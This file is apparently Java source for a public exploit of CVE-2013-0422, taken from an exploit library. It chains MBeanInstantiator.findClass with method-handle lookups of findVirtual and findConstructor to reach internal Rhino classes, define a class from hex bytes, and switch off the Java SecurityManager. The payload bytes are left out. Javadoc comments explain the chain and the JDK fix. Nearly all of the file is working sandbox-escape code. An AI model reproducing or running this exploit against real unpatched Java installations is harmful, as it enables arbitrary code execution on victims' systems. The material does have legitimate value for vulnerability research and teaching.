
Source Code of CVE_2013_0422

/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/

import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

/**
* This vulnerability was officially fixed in JDK 1.7.0_11, but the entry linked
* below states that it may not be fixed completely: "a reliable third party has
* claimed that the findClass/MBeanInstantiator vector was not fixed in Oracle
* Java 7 Update 11. If there is still a vulnerable condition, then a separate
* CVE identifier might be created for the unfixed issue."
*
* This was the fix:
*
* In MethodHandles this method was inserted:
*
* private MethodHandle maybeBindCaller(MemberName method, MethodHandle mh)
*     throws IllegalAccessException {
*   if (allowedModes == TRUSTED || !MethodHandleNatives.isCallerSensitive(method))
*     return mh;
*   Class<?> hostClass = lookupClass;
*   if ((allowedModes & PRIVATE) == 0) // caller must use full-power lookup
*     hostClass = null;
*   MethodHandle cbmh = MethodHandleImpl.bindCaller(mh, hostClass);
*   cbmh = fixVarargs(cbmh, mh); // in JDK 7 version, varargs happens earlier and must be repaired
*   return cbmh;
* }
*
* It is not consistently (?) called at:
*
* accessSpecial(Class<?>, MemberName, Class<?>)
* accessStatic(Class<?>, MemberName)
* accessVirtual(Class<?>, MemberName)
* bind(Object, String, MethodType)
* unreflect(Method)
* unreflectSpecial(Method, Class<?>)
*
* The method replaces DirectMethodHandle by AdapterMethodHandle, which results
* in a new stack layout:
*
* MethodHandles$Lookup.findConstructor(Class<?>, MethodType) line: 685
* MethodHandleImpl$BindCaller$T.invoke_V(MethodHandle, Object[]) line: 1422 // new frame!
* AdapterMethodHandle(MethodHandle).invokeWithArguments(Object...) line: 566
* CVE_2013_0422.createContextObject(Class, MethodHandles$Lookup) line: 80
* CVE_2013_0422.disableSecurity() line: 42
* CVE_2013_0422.main(String[]) line: 29
*
* whereas before the fix the stack was:
*
* MethodHandles$Lookup.findConstructor(Class<?>, MethodType) line: 685
* DirectMethodHandle(MethodHandle).invokeWithArguments(Object...) line: 566
* CVE_2013_0422.createContextObject(Class, MethodHandles$Lookup) line: 80
* CVE_2013_0422.disableSecurity() line: 42
* CVE_2013_0422.main(String[]) line: 29
*
* With the new layout, security checks work again: the inserted BindCaller frame is
* what the caller-sensitive lookup methods now inspect as their caller, so the
* access check no longer sees a trusted java.lang.invoke frame standing in for
* the untrusted code that really made the call.
*
*
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422
*/
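public class CVE_2013_0422 {

  /**
   * Hex-encoded class file that {@link #hex2Byte(String)} decodes and {@link #createCustomClass}
   * hands to {@code GeneratedClassLoader.defineClass}. Nothing in this listing assigns it, so it is
   * {@code null} unless a caller sets it before {@link #main}; the field name suggests the class
   * clears the security manager, but its content is not part of this listing.
   */
  public static String byteArrayWithSecOff;

  /** Public lookup created in {@link #disableSecurity()} and reused by the helper methods. */
  private static MethodHandles.Lookup lookup;

  /**
   * Installs a {@link SecurityManager}, runs the chain and prints the manager before and after,
   * so the outcome (or, on a patched JDK, the access failure) is visible on the console.
   *
   * @param args ignored
   * @throws Throwable whatever the reflective chain throws; per the class Javadoc, on JDK
   *     1.7.0_11 and later the {@code findConstructor} step fails its access check
   */
  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    System.out.println("SecurityManager: " + System.getSecurityManager());

    disableSecurity();
    System.out.println("SecurityManager: " + System.getSecurityManager());
  }

  /**
   * Drives the chain described in the class Javadoc: resolves two {@code sun.*} classes through
   * {@code MBeanInstantiator.findClass}, obtains a handle to {@code Lookup.findVirtual} and uses it
   * to reach {@code Context.createClassLoader} and {@code GeneratedClassLoader.defineClass}, then
   * instantiates the class that was defined.
   *
   * @throws Throwable propagated from the method-handle invocations; on a patched JDK the first
   *     failure is inside {@link #createContextObject}
   */
  private static void disableSecurity() throws Throwable {
    JmxMBeanServer beanServer = (JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("", null, null);
    MBeanInstantiator beanInstantiator = beanServer.getMBeanInstantiator();
    // This is the "findClass/MBeanInstantiator vector" the class Javadoc mentions: the
    // instantiator returns Class objects for a sun.* package that a direct Class.forName would be
    // refused under the security manager's package-access check. The loader argument is null.
    ClassLoader loader = null;
    Class<?> contextClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", loader);
    Class<?> generatedClassLoaderClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", loader);

    lookup = MethodHandles.publicLookup();

    Object contextObject = createContextObject(contextClass, lookup);

    // A handle to Lookup.findVirtual(Class, String, MethodType) itself. Calling findVirtual
    // through a handle rather than directly is the core of the chain: before the fix described in
    // the class Javadoc, the caller-sensitive access check saw a trusted java.lang.invoke frame
    // instead of this class as the caller.
    MethodType findVirtualType = MethodType.methodType(MethodHandle.class, Class.class, String.class, MethodType.class);
    MethodHandle findVirtualHandle = lookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", findVirtualType);

    Object classLoader = createClassLoader(contextClass, generatedClassLoaderClass, contextObject, findVirtualHandle);
    Class<?> customClass = createCustomClass(generatedClassLoaderClass, findVirtualHandle, classLoader);

    // Running the defined class's no-arg constructor is the step that performs the privileged
    // action. Class.newInstance is deprecated since Java 9; kept because this is JDK 7-era code.
    customClass.newInstance();
  }

  /**
   * Resolves {@code GeneratedClassLoader.defineClass(String, byte[])} through the
   * {@code findVirtual} handle and defines the class encoded in {@link #byteArrayWithSecOff}.
   *
   * @param generatedClassLoaderClass the {@code GeneratedClassLoader} class object
   * @param findVirtualHandle handle to {@code Lookup.findVirtual}, obtained in {@link #disableSecurity()}
   * @param classLoader the {@code GeneratedClassLoader} instance from {@link #createClassLoader}
   * @return the newly defined class; the class-name argument is passed as {@code null}
   * @throws Throwable propagated from the handle invocations
   */
  private static Class<?> createCustomClass(Class<?> generatedClassLoaderClass, MethodHandle findVirtualHandle, Object classLoader) throws Throwable {
    MethodType defineClassType = MethodType.methodType(Class.class, String.class, byte[].class);
    MethodHandle defineClassHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(lookup, generatedClassLoaderClass, "defineClass", defineClassType);

    return (Class<?>) defineClassHandle.invokeWithArguments(classLoader, null, hex2Byte(byteArrayWithSecOff));
  }

  /**
   * Resolves {@code Context.createClassLoader(ClassLoader)} through the {@code findVirtual} handle
   * and calls it on the given {@code Context} instance with a {@code null} parent loader.
   *
   * @param contextClass the {@code Context} class object
   * @param generatedClassLoaderClass return type of {@code createClassLoader}
   * @param contextObject the {@code Context} instance from {@link #createContextObject}
   * @param findVirtualHandle handle to {@code Lookup.findVirtual}, obtained in {@link #disableSecurity()}
   * @return the {@code GeneratedClassLoader} returned by {@code createClassLoader}
   * @throws Throwable propagated from the handle invocations
   */
  private static Object createClassLoader(Class<?> contextClass, Class<?> generatedClassLoaderClass, Object contextObject, MethodHandle findVirtualHandle)
      throws Throwable {
    MethodType createClassLoaderType = MethodType.methodType(generatedClassLoaderClass, ClassLoader.class);
    MethodHandle createClassLoaderHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(lookup, contextClass, "createClassLoader", createClassLoaderType);

    return createClassLoaderHandle.invokeWithArguments(contextObject, null);
  }

  /**
   * Obtains a handle to {@code Lookup.findConstructor(Class, MethodType)}, uses it to look up the
   * no-arg constructor of {@code contextClass} and invokes that constructor.
   *
   * @param contextClass the {@code Context} class object
   * @param lookup the lookup the constructor is resolved with (the public lookup in this listing)
   * @return a new {@code Context} instance
   * @throws Throwable propagated from the handle invocations; per the class Javadoc this is the
   *     call whose stack gains the BindCaller frame on JDK 1.7.0_11 and later, so the access
   *     check then fails here
   */
  private static Object createContextObject(Class<?> contextClass, MethodHandles.Lookup lookup) throws Throwable {
    MethodType findConstructorType = MethodType.methodType(MethodHandle.class, Class.class, MethodType.class);
    MethodHandle findConstructorHandle = lookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", findConstructorType);

    MethodType constructorType = MethodType.methodType(Void.TYPE);
    MethodHandle constructorHandle = (MethodHandle) findConstructorHandle.invokeWithArguments(lookup, contextClass, constructorType);

    return constructorHandle.invokeWithArguments();
  }

  /**
   * Decodes a hex string (two characters per byte, either case) into bytes.
   *
   * @param paramString the hex text; must have even length and contain only hex digits
   * @return the decoded bytes, empty for an empty string
   * @throws NullPointerException if {@code paramString} is {@code null}
   * @throws IllegalArgumentException if the length is odd or a character is not a hex digit
   *     (the original silently dropped a trailing nibble, which would corrupt a class file)
   */
  public static byte[] hex2Byte(String paramString) {
    if (paramString == null) {
      throw new NullPointerException("paramString");
    }
    int length = paramString.length();
    if (length % 2 != 0) {
      throw new IllegalArgumentException("hex string must have even length, got " + length);
    }
    byte[] decoded = new byte[length / 2];
    for (int i = 0; i < decoded.length; i++) {
      // Character.digit rejects signs and non-hex characters that Integer.parseInt would accept.
      int hi = Character.digit(paramString.charAt(2 * i), 16);
      int lo = Character.digit(paramString.charAt(2 * i + 1), 16);
      if (hi < 0 || lo < 0) {
        throw new IllegalArgumentException("non-hex character at index " + (2 * i));
      }
      decoded[i] = (byte) ((hi << 4) | lo);
    }
    return decoded;
  }
}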